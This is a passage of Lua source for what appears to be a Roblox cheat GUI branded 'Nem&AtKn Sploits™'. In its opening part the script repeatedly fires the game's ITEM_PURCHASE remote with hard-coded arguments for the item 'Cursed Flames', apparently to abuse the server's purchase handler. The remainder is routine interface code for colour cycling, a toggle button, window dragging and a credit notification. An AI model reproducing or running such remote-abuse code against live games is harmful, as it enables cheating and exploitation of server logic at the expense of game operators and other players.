			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
		local args = {
			[1] = "Cursed Flames",
			[2] = "45",
			[3] = "3756389957",
		}
		
		game:GetService("ReplicatedStorage").ITEM_PURCHASE:InvokeServer(unpack(args))
	end)
end
coroutine.wrap(SHUCO_fake_script)()
local function ZMRYSB_fake_script() -- Rainbow_2.RainbowFunction 
	local script = Instance.new('LocalScript', Rainbow_2)

	while true do 
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.BackgroundColor3 = Color3.new(i, 0, n)
	wait() 
	end
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.BackgroundColor3 = Color3.new(n, i, 0)
	wait()
	end
	i = 0
	for n=1,0,-0.05 do 
	i = i + 0.05
	script.Parent.BackgroundColor3 = Color3.new(0, n, i)
	wait() 
	end 
	end
end
coroutine.wrap(ZMRYSB_fake_script)()
local function KARWE_fake_script() -- CloseOpen_2.Script 
	local script = Instance.new('Script', CloseOpen_2)

	local hub = script.Parent.Parent.Hub
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
	if hub.Visible==true then button.Text="+" hub.Visible=false
	else hub.Visible=true button.Text="-"
	end
	end)
end
coroutine.wrap(KARWE_fake_script)()
local function XMOFQPR_fake_script() -- Misc.Dragging 
	local script = Instance.new('LocalScript', Misc)

	local lplayer = game:GetService('Players').LocalPlayer
	local UIS = game:GetService("UserInputService")
	wait(1)
	
	
	function dragify(Frame)
	    dragToggle = nil
	    dragSpeed = 1
	    dragInput = nil
	    dragStart = nil
	    dragPos = nil
	    function updateInput(input)
	        Delta = input.Position - dragStart
	        Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			if UIS:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
			        end
			end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	dragify(script.Parent)
end
coroutine.wrap(XMOFQPR_fake_script)()
local function QHAEKS_fake_script() -- CatalogGameGui.Message 
	local script = Instance.new('LocalScript', CatalogGameGui)

	local StarterGui = game:GetService("StarterGui")
	
	local Notifications = {
		"Notification Message 1",
	}
	
	local TimeBetweenNotifications = 5 --REPLACE 5 WITH THE NUMBER OF SECONDS YOU WANT TO WAIT IN BETWEEN NOTIFICATIONS APPEARING
	
	for i = 1, #Notifications do
		local Notification = Notifications[i]
		
		StarterGui:SetCore("SendNotification", {
			Title = "Nem&AtKn Sploits™";
			Text = "Gui made by Nem&AtKn Sploits™";
			Icon = "rbxassetid://4833960080";
			Duration = 7;
		})
		
		wait(TimeBetweenNotifications)
	end
end
coroutine.wrap(QHAEKS_fake_script)()
